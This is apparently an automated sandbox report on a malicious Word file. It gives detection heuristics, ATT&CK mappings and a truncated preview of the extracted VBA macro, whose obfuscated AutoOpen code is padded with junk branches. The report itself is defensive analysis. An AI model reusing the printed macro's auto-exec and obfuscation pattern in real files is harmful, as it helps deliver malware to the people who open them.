MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV and exhibits high-severity heuristics indicating the presence of an AutoOpen VBA macro that uses GetObject for execution. The VBA script itself is heavily obfuscated but its structure suggests it is designed to execute code, likely to download and run a second-stage payload. No specific family could be confidently identified.
Heuristics 7
-
ClamAV: Doc.Malware.Dvwf-6956245-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dvwf-6956245-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25546 bytes |
SHA-256: 042bb826fc2e80b80c7499812e5403287d0a004f5dc1c6d08f117da1b5f06e6f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OAAAZC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wQDCAcC"
Attribute VB_Base = "0{EC36BAE5-7ADE-4F95-B004-CE1957793634}{5B1E76E0-9352-4FC3-AED8-71E38191B46E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "I4XAUBBZ"
Attribute VB_Base = "0{C824A8E8-B0A3-406D-9B48-F91A9EA68976}{0778C759-CC9F-4601-AD3A-CD781E9CA4CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "dBACAAA1"
Sub autoopen()
If v_AQQCBc = kZABkQA Then
ElseIf u_UAUCA = mxBDXA Then
s4ACxUA = Atn(454565679)
ElseIf YCkkooQ = LUxBQ41 Then
uA1UA_GQ = Int(999281804)
ElseIf oA4Q1QAX = j1GQAA Then
End If
If LQX4BAA = iAABBABQ Then
ElseIf m_4AUBAA = hUAAZB Then
b_QUAX = Atn(430765672)
ElseIf jwDAAD = t4xAxAQo Then
KcUDcU = Int(727024415)
ElseIf MxGA1D_A = qXxDc4 Then
End If
If UQcoCA = ZXAUGD Then
ElseIf KAZUBAB = ZAUUAk Then
ZA1AQB_ = Atn(632069907)
ElseIf IACDXDA = FZGDAAQA Then
jAA_AXx = Int(911954614)
ElseIf QxDAoG4A = AAAw_c Then
End If
c4DDUC
If wABAQQ = iDQkAw Then
ElseIf VQD1UU_ = tZUXBDBA Then
nAXkDD1A = Atn(39628240)
ElseIf hAAAcxXZ = j_QAAB Then
mCBA1G = Int(53483851)
ElseIf zCA1AXA = XC4AAA Then
End If
If lABXZQ = AAAABA Then
ElseIf MUBkQD = YGQBDBG Then
LoAAAUkA = Atn(70914249)
ElseIf ADACAA = sAD4UXA Then
bAAwAc = Int(631660017)
ElseIf ToG_QU = SDQBQAcA Then
End If
End Sub
Function XXxX4Dw(mQoADc)
If MAA4A4G = zDCcQA Then
ElseIf VoA1ABB = MDQBAA Then
aACDxXG = Atn(903441126)
ElseIf rA11AAoB = PcDUAXD Then
TBB4_AA = Int(374880229)
ElseIf lDUDAxx = j4c1ZQwQ Then
End If
If UUAAU_ = f1QUAo Then
ElseIf t4oAcZ = twGAAADB Then
IZw4oAUA = Atn(324071606)
ElseIf SAc11AA = BAAAQXAA Then
LGcAUAAA = Int(711569659)
ElseIf rXoAQcU4 = CUABA4A Then
End If
Set XXxX4Dw = CVar(mQoADc)
If YAQG_w = wAADcA Then
ElseIf pXQAo_G = uAGA4AAZ Then
pAAAACo = Atn(806537656)
ElseIf U1UA_B = BXxGDG Then
rwDAXBBQ = Int(875458927)
ElseIf H1DcAD = ixQ4QBU Then
End If
If pkBoxZGA = QAA4D1kQ Then
ElseIf VBXAAcoU = ickQDAA Then
HXX1Dk = Atn(396828347)
ElseIf CAowAAU = WkxA1UAA Then
jQXAQQ = Int(397614101)
ElseIf cBADDD = mDX1AkAU Then
End If
End Function
Attribute VB_Name = "v_oDAA1"
Function c4DDUC()
On Error Resume Next
If TADxxoB = wGU1Qo Then
ElseIf XUZBA1A = AQA1Q1Z Then
WAcQQ_Bc = Atn(902672992)
ElseIf uA4_c4 = BAAA_ABx Then
WUoc4_GA = Int(685590749)
ElseIf lDUQ1_ = k1AAG1BU Then
End If
If cDAUAABA = IAcUAZG Then
ElseIf TA4ADQ = zCQQADw Then
dxAXkoDZ = Atn(512946224)
ElseIf OZAoAA = wQDXQBAX Then
SwAXAAGC = Int(918804106)
ElseIf NABGA1_A = EA111wB Then
End If
If 5072 < 19851 Then
tA_QAB4w = vbFalse
If qGAAwowB = iCGAQBZ Then
ElseIf b1XAwU = n_GAAAc Then
NooAGwcC = Atn(996313995)
ElseIf UBxUAwB = MUXBA_D Then
oAUUx1A = Int(645588906)
ElseIf EX_wGQAX = fBAQQZBG Then
End If
If jUAAGUoc = v44GACQ Then
ElseIf J1GDXACQ = LAAwAAA Then
Y4AA_AA = Atn(887414397)
ElseIf UCCAQA = fQcAAk Then
iDDXAcBo = Int(141127305)
ElseIf AXXAXGD = OZxZQwQB Then
End If
If wAAADDQ = Aw4wQDA Then
ElseIf PAAZADU = tBGDwB4 Then
nAAUDAA = Atn(51129147)
ElseIf FCxAw4A = YxABDUAA Then
BQABBZUA = Int(578241693)
ElseIf txAA4ABA = IwA_QcU
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.